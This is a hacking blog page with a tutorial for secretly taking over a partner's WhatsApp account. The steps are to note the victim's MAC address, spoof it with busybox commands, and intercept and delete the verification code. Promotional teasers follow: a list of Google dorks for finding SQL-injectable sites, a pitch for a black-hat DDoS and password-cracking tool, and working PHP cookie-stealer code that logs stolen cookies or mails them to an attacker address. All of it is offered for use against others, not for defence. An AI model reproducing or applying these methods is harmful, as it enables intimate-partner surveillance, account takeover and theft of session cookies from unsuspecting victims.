Skip to main content

Whatsapp Hacking By MacSpoofing


Everyone want to access other conversation especially boyfriend want to spy on Girlfriend conversation via whatsapp & Vice versa .

So here's the simple method to access other whatsapp conversations.
{For Beginners}

MAC address Spoofing (Level : Hard)
[But this need physical access of the Victim devices]
Ok here how it goes

MAC Address Spoofing

1. Whatsapp Uninstall
Firstly go to App Manager, search Whatsapp messenger and uninstall Whatsapp from your device. Make sure you that your Whatsapp account is completely uninstall from your android device.
Delete the Folder of Whatsapp as well in the File Manager.

2 . Get victim’s phone
Get the victim’s android phone which you want to access. You need the victim;s phone for few minutes for the hacking process.

3. Find MAC (Media Acess Control) address from the victim’s phone
We don’t know which OS platform is victim using. So below we give you all smartphone platform, with these you will easily find MAC Address from victim;s phone.
Android : Go to the setting > About phone > wifi MAC address
Iphone : Go to Setting > General > About > MAC Address.
Window Phone : Go to Setting > About > More Info > MAC address
Blackberry : Option > Go to Device >Device and Status Info > WLAN MAC

4 . Save Victim’s MAC address
After finding a MAC address, you have to save MAC address on the paper or where you want. Make sure you save right MAC address.

5. Find MAC Address of your own device
Get your mac address of your smartphone and save it for future when you want to access your own Whatsapp account.

6. Spoofing your mac address
Now you need to spoofing your Mac address.

7. Install Terminal Emulator . After installed you have to change your MAC address with victim phone’s MAC address. By typing $su and now hit Enter.

8. Now again type the below and then hit Enter. This will show you mac address for your confirmation.
$busybox iplink show eth0 

9. Now again, type the following command
$ busybox ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX

10. Replace XX:XX:XX:XX:XX:XX with you friend/victim’s Android mac address which noted down in first step.

11. Now, you have successfully changed your Android device mac address. Now, you can confirm this by typing the following command,
$ busybox iplink show eth0

8. Re-install Whatsapp Messenger on your device
After Spoofing MAC address and Installing Whatsapp Messenger on your device, you can easily access victim’s Whatsapp account just follow a few more steps.

Open Whatsapp messenger and enter victim’s mobile number.

Now take victim’s phone for few second because after entered victim’s number, you have to get Whatsapp confirmation code from victim’s phone.
After getting code fill it into Whatsapp on your phone and delete confirmation message from victim's phone.
You can also spoof the Verification Code. I'll post another tutorial for that.

Comments

Popular posts from this blog

Php And Google Dorks 2017

A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=...

Download Hacking tool and library for rookie

Hello guy's, In today's post i will be sharing with guy's some useful Black-hat Hacking tool which is very very useful for beginners in hacking, Have been using this tool for the past few month, its a nice tool .This Tool can be used to password cracker, DDOS tool, email scraper, web spider, website hacking.This wonderful tool was develop by  hackerlord. Description Black-hat hacking tool to easily hack website, scrape email, port scanner, crack FTP password, launch DDOS attack, mysql injection, easily hijack website, web spider, website vulnerability scanner and social engineering tool. Features hacking tool email scraper facebook account hacking tool social engineering FTP password cracker web spider tool DDOS tool port scanner vulnerability scanner gmail account hacking tool easily shut a website down easily read and write data into a website database Download

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...